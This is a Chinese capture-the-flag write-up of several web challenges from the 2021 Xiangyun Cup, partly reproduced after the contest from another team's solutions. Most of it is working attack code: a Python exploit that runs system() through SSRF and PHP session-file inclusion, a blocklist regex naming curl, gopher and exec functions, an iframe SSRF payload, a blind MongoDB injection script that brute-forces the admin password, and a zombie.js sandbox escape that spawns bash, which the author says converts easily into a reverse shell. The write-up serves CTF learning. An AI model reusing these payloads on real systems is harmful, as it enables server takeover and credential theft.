2021-第二届祥云杯-Web-WP[部分赛后复现]

2021 第二届祥云杯 Web WriteUp

打了两天Web,有一些做出来了,有一些没做出来,感觉还是知识点不够全面。

赛后找到了全做出来的队伍的WP:

第二届”祥云杯” WEB WP - 安全客,安全资讯平台 (anquanke.com)

跟着复现了一遍,都记录一下吧!

做出来的

安全检测

进去登录之后是一个输入框,输入url服务器就会去访问,如果响应正常,访问preview.php服务器就会再访问一次,然后file_get_contents内容返回。

这里有个waf过滤了很多。

用dirsearch扫到有个admin目录是403,用ssrf打过去,admin下有个include123.php,访问拿到如下源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
$u=$_GET['u'];

$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
//累了累了,饮茶先

$vpattern = explode("|",$pattern);

foreach($vpattern as $value){
if (preg_match( "/$value/i", $u )){
echo "检测到恶意字符";
exit(0);
}
}

include($u);
show_source(__FILE__);
?>

这里尝试include /tmp/sess_PHPSESSID,是可以读到的,能看到,url会存在session文件里。

这里就可以通过include session文件来执行任意php代码。

payload :

1
u=/tmp/sess_{PHPSESSID}&<?=phpinfo();>

写了个exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
import urllib.parse

url = "http://eci-2zeja2ipip8vfmlfx65z.cloudeci1.ichunqiu.com"
cookie = "6bec0ccc9d15ed510b3e1651ac571dd2"
header = {
"cookie":"PHPSESSID="+cookie
}
#print(urllib.parse.quote((urllib.parse.quote("ls /"))))
shell1 = (urllib.parse.quote("cat /getfl"))
shell2 = (urllib.parse.quote("ag.sh")) #因为输入的url会拦截'flag',所以采用参数拼接来执行
r = requests.post(url+"check2.php",data={"url1":"http://127.0.0.1/admin/include123.php?shell1="+shell1+"&shell2="+shell2+"&u=/tmp/sess_"+cookie+"&><?=print('\n\n');system($_GET['shell1'].$_GET['shell2']);print('\n');?>"},headers=header)

r = requests.get(url,headers=header)

r = requests.get(url+"preview.php",headers=header)
print(r.text)

Secrets_Of_Admin

这道题给我的感觉就是很多障眼法,其实最后get flag的方法十分简单…(服气

一进去是个登录框

image-20210824152926109

admin的密码可以在database.ts获得

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
let db = new sqlite3.Database('./database.db', (err) => {
if (err) {
console.log(err.message)
} else {
console.log("Successfully Connected!");
db.exec(`
DROP TABLE IF EXISTS users;

CREATE TABLE IF NOT EXISTS users (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
username VARCHAR(255) NOT NULL,
password VARCHAR(255) NOT NULL
);

INSERT INTO users (id, username, password) VALUES (1, 'admin','e365655e013ce7fdbdbf8f27b418c8fe6dc9354dc4c0328fa02b0ea547659645');

DROP TABLE IF EXISTS files;

CREATE TABLE IF NOT EXISTS files (
username VARCHAR(255) NOT NULL,
filename VARCHAR(255) NOT NULL UNIQUE,
checksum VARCHAR(255) NOT NULL
);

INSERT INTO files (username, filename, checksum) VALUES ('superuser','flag','be5a14a8e504a66979f6938338b0662c');`);
//这里直接预先存了一条flag的索引记录
console.log('Init Finished!')
}
});

登录进去是这样的

image-20210824153223284

这部分的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
router.post('/admin', checkAuth, (req, res, next) => {
let { content } = req.body;
if ( content == '' || content.includes('<') || content.includes('>') || content.includes('/') || content.includes('script') || content.includes('on')){ //这一行会拦截一些关键词以防xss,但是将content改成content[],变成数组即可绕过
// even admin can't be trusted right ? :)
return res.render('admin', { error: 'Forbidden word 🤬'});
} else {
//这里会将content的内容放入一个html里
let template = `
<html>
<meta charset="utf8">
<title>Create your own pdfs</title>
<body>
<h3>${content}</h3>
</body>
</html>
`
try {
const filename = `${uuid()}.pdf`
pdf.create(template, {
"format": "Letter",
"orientation": "portrait",
"border": "0",
"type": "pdf",
"renderDelay": 3000,
"timeout": 5000
}).toFile(`./files/${filename}`, async (err, _) => { //这里将html转成pdf
if (err) next(createError(500));
const checksum = await getCheckSum(filename); //根据文件名生成一个checksum
console.log(checksum)
await DB.Create('superuser', filename, checksum) //以superuser的身份创建这个文件的索引,checksum是索引id
return res.render('admin', { message : `Your pdf is successfully saved 🤑 You know how to download it right?`});
});
} catch (err) {
return res.render('admin', { error : 'Failed to generate pdf 😥'})
}
}
});

那么content发过去之后,要如何访问存着的pdf呢,有这么一个接口:

1
2
3
4
5
6
7
8
9
10
11
12
13
router.get('/admin', checkAuth, async (req, res) => {
let token = req.signedCookies['token'];
try {
const files = await DB.listFile(token.username);
console.log(files)
if (files) {
res.cookie('token', {username: token.username, files: files, isAdmin: true }, { signed: true })
}
} catch (err) {
return res.render('admin', { error: 'Something wrong ... 👻'})
}
return res.render('admin');
});

只要访问这个接口,就会根据token的username获取files的信息存在token里,因为是superuser的身份创建的文件,所以我们需要以superuser的token来访问

在app.ts里我们可以看到cookie的生成是有固定key的,那么根据这个key去伪造token就好了。

但是当以superuser的身份来访问的时候,又有新的问题:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
const checkAuth = (req: Request, res:Response, next:NextFunction) => {
let token = req.signedCookies['token']
if (token && token["username"]) {
if (token.username === 'superuser'){ //所以需要checkAuth的接口,只要是superuser的身份都会直接返回404
next(createError(404)) // superuser is disabled since you can't even find it in database :)
}
if (token.isAdmin === true) {
next();
}
else {
return res.redirect('/')
}
} else {
next(createError(404));
}
}

找不到地方绕过去,看来是拿不到上传的文件信息了。

再让我们看/api/files和/api/files/:id

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// You can also add file logs here! 这个接口可以自行添加文件的索引记录
router.get('/api/files', async (req, res, next) => {
if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') { //这里限制了只能127.0.0.1访问
return next(createError(401));
}
let { username , filename, checksum } = req.query; //传入三个参数,分别是文件的上传者,文件名,还有checksum
if (typeof(username) == "string" && typeof(filename) == "string" && typeof(checksum) == "string") {
try {
await DB.Create(username, filename, checksum) //直接在数据库中插入记录
return res.send('Done')
} catch (err) {
return res.send('Error!')
}
} else {
return res.send('Parameters error')
}
});
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
router.get('/api/files/:id', async (req, res) => {
let token = req.signedCookies['token']
if (token && token['username']) {
if (token.username == 'superuser') { //如果登录身份是superuser会直接返回
return res.send('Superuser is disabled now');
}
try {
let filename = await DB.getFile(token.username, req.params.id) //根据url里的id作为checksum,结合token的username查找文件名
if (fs.existsSync(path.join(__dirname , "../files/", filename))){//根据查找到的文件名返回文件内容,flag就放在../flies/flag里
return res.send(await readFile(path.join(__dirname , "../files/", filename)));
} else {
return res.send('No such file!');
}
} catch (err) {
return res.send('Error!');
}
} else {
return res.redirect('/');
}
});

仔细审计了get:/api/files和get:/api/files/:id还有post:/admin之后,思路逐渐清晰起来。

我们可以在post:/admin的content中放一个iframe,转成pdf是会解析iframe的。

content的payload:

1
content[]=<iframe src="http://127.0.0.1:8888/api/files?username=当前登录用户名&filename=/flag&checksum=任意checksum"></iframe>

这时服务器通过本机访问了get:/api/files,成功创建了一条文件索引。

然后我们再根据提交的任意checksum访问get:/api/files/[任意checksum],就可以拿到flag内容了。

image-20210824162010714

PackageManager2021

写累了,细节不写了,有精力再补吧😂

index.ts:66

1
let docs = await User.$where(`this.username == "admin" && hex_md5(this.password) == "${token.toString()}"`).exec()

这里有个mongodb注入

payload:

1
bfc31e7c22340f30e5b15badc0cafead" || this.password['+str(i)+'] == "'+chr(x)+'" && this.username == "admin

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests

url = "http://localhost:8888/auth"
header = {
"cookie":"session=s%3ADS_lSaFLU5N1g58ZN4fCSLV0X0O9TaAX.tq%2FPIh%2F%2BtqVuzC62UnA7I3lU6HcJ7t9tap3njjzCBAM"
}
def test(payload):
r = requests.post(url,data={
"_csrf":"T9j6USpU-2tx5OeLywlKvwZlq4hSPXdeGFLA",
"token":payload
},headers=header,allow_redirects=False)
print(r.text)
print(result)
return "Found" in r.text

result = ""
for i in range(0,100):
for x in range(32,128):
if(test('bfc31e7c22340f30e5b15badc0cafead" || this.password['+str(i)+'] == "'+chr(x)+'" && this.username == "admin')):
result = result + chr(x)
print(result)
break

爆出admin密码

登录即可看到flag

没做出来的

这部分看着 第二届”祥云杯” WEB WP - 安全客,安全资讯平台 (anquanke.com) 复现的

crawler_z

这道题开始主要关注这三个接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
router.post('/profile', async (req, res, next) => {
let { affiliation, age, bucket } = req.body; //post三个参数进来,主要是在bucket上
const user = await User.findByPk(req.session.userId);
if (!affiliation || !age || !bucket || typeof (age) !== "string" || typeof (bucket) !== "string" || typeof (affiliation) != "string") {
return res.render('user', { user, error: "Parameters error or blank." });
}
//================这里贴一个checkBucket方法=================
checkBucket(url) {
try {
url = new URL(url);
} catch (err) {
return false;
}
if (url.protocol != "http:" && url.protocol != "https:") return false; //url必须是http或者https
if (url.href.includes('oss-cn-beijing.ichunqiu.com') === false) return false; //url中必须要有"oss-cn-beijing.ichunqiu.com"
return true;
}
//=======================================================
if (!utils.checkBucket(bucket)) {//bucket传进来之后会检查 ⬆️
return res.render('user', { user, error: "Invalid bucket url." });
}
let authToken;
try {
await User.update({
affiliation,
age,
personalBucket: bucket //bucket不是立即更新,而是存在personalBucket里
}, {
where: { userId: req.session.userId }
});
const token = crypto.randomBytes(32).toString('hex'); //给这次更新请求生成一个token
authToken = token;
await Token.create({ userId: req.session.userId, token, valid: true }); //带着token和userId插入一条Token表记录
await Token.update({ //这里将该用户除了此次更新请求以外的其他记录,valid都设置成false
valid: false,
}, {
where: {
userId: req.session.userId,
token: { [Op.not]: authToken }
}
});
} catch (err) {
next(createError(500));
}
if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(bucket)) {
//如果申请更新bucket符合这个正则表达式,则带着token直接跳转到/user/verify,去更新bucket
res.redirect(`/user/verify?token=${authToken}`)
} else {
//这里就不会跳转,后续我们也没办法拿到authToken
// Well, admin won't do that actually XD.
return res.render('user', { user: user, message: "Admin will check if your bucket is qualified later." });
}
});
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

router.get('/verify', async (req, res, next) => {
let { token } = req.query; //传进来token
if (!token || typeof (token) !== "string") {
return res.send("Parameters error");
}
let user = await User.findByPk(req.session.userId);
const result = await Token.findOne({ //根据token和userId还有valid的状态获取更新请求的数据
token,
userId: req.session.userId,
valid: true
});
if (result) {
try {
await Token.update({ //把该用户所有请求的valid都改成false
valid: false
}, {
where: { userId: req.session.userId }
});
await User.update({ //把personalBucket更新到user表里的bucket
bucket: user.personalBucket
}, {
where: { userId: req.session.userId }
});
user = await User.findByPk(req.session.userId);
return res.render('user', { user, message: "Successfully update your bucket from personal bucket!" });
} catch (err) {
next(createError(500));
}
} else {
user = await User.findByPk(req.session.userId);
return res.render('user', { user, message: "Failed to update, check your token carefully" })
}
})
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
// Not implemented yet
router.get('/bucket', async (req, res) => {
const user = await User.findByPk(req.session.userId);
if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) {
return res.json({ message: "Sorry but our remote oss server is under maintenance" });
} else {
// Should be a private site for Admin
try {
//这里根据user表里的bucket执行爬虫,主要的漏洞就出现在这一块儿
const page = new Crawler({
userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
referrer: 'https://www.ichunqiu.com/',
waitDuration: '3s'
});
await page.goto(user.bucket);
const html = page.htmlContent;
const headers = page.headers;
const cookies = page.cookies;
await page.close();

return res.json({ html, headers, cookies});
} catch (err) {
return res.json({ err: 'Error visiting your bucket. ' })
}
}
});

首先第一步要解决如果更新替换bucket的问题。

从代码逻辑上可以看到,我们可以用burp提交一个符合正则表达式的bucket进去,截住重定向。

然后再提交一个我们自己要更新的bucket进去比如

http://oss-cn-beijing.ichunqiu.com.example.com:1234

或者

http://example.com?oss-cn-beijing.ichunqiu.com

等等。

最后放了那个重定向访问,就可以成功把他换成我们需要的url。

那么第二步就着手要通过这个url打ssrf来获取服务器权限。

zombie库有漏洞,但是当时搜遍全网都没搜索到,安全客文章里的链接是我看到的唯一一篇有关于zombie库漏洞的exp。

文章链接:https://ha.cker.in/index.php/Article/13563

除此之外没有其他任何信息,分析了一晚上这个漏洞,晚些有空可以把分析写一篇文章出来。

那么这道题的zombie是这样写的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
class Crawler {
constructor(options) {
this.crawler = new zombie({
userAgent: options.userAgent,
referrer: options.referrer,
silent: true,
strictSSL: false
});
}

goto(url) {
return new Promise((resolve, reject) => {
try {
this.crawler.visit(url, () => { //漏洞就在这里
const resource = this.crawler.resources.length
? this.crawler.resources.filter(resource => resource.response).shift() : null;
this.statusCode = resource.response.status
this.headers = this.getHeaders();
this.cookies = this.getCookies();
this.htmlContent = this.getHtmlContent();
resolve();
});
} catch (err) {
reject(err.message);
}
})
}

要如何执行获取服务器权限呢?只需要在爬虫访问的目标里放上这样的内容:

1
2
3
4
5
6
7
<!-- http://bucket/exp.html -->
<script>
//这部分代码会直接执行,在这里做vm沙箱逃逸即可
var p = this.constructor.constructor('return process')();
sync=p.mainModule.require('child_process').spawnSync;
sync('bash',['-c' ,'open /System/Applications/Calculator.app']); //mac环境下测试
</script>

效果如下:

291891492291361822021-08-24_17.44.12

直接代码改成反弹shell即可

其他还在写….